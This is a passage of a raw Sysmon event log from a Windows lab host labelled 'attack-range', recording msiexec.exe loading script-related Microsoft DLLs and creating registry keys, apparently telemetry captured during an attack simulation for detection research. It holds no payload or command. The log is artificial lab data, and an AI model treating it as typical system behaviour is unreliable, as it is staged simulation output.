CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700141Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700140Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700139Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700138Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700137Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.709{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManagerWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700136Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700135Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700134Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700133Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700132Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700131Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700130Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=6E948305B041BE52E45E9E942C78A3F4,SHA256=93C4A201E3627E617C478054BAB472553CF48B84C32DE2F0A316F30F4A61A782trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700129Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700128Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=012C02BB5DD8EC0FD4AC2688D8D4D0CF,SHA256=B73B3C361F6B07960B092485CE8C96A4E68F741D718C6E847FF37C5BA5227C18trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700127Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700126Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700125Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700124Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows Script\SettingsWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700123Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700122Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\jscript.dll5.812.10240.16384Microsoft ® JScriptMicrosoft ® JScriptMicrosoft Corporationjscript.dllMD5=017AA3E55F15439E32C6F461E5686CCD,SHA256=8117D34017F6F90BC9DC68E3F79346E62E389AFE9E154FF0FCB99FB921845486trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700121Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700120Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700119Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.694{7CF983DC-9829-62AC-5A6B-000000006202}10282136C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002700118Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700117Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700116Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700115Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700114Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700113Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700112Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700111Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700110Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700109Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700108Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700107Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700106Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700105Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700104Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700103Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.678{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700102Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700101Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700100Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700099Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700098Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700097Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700096Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700095Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700094Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700093Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 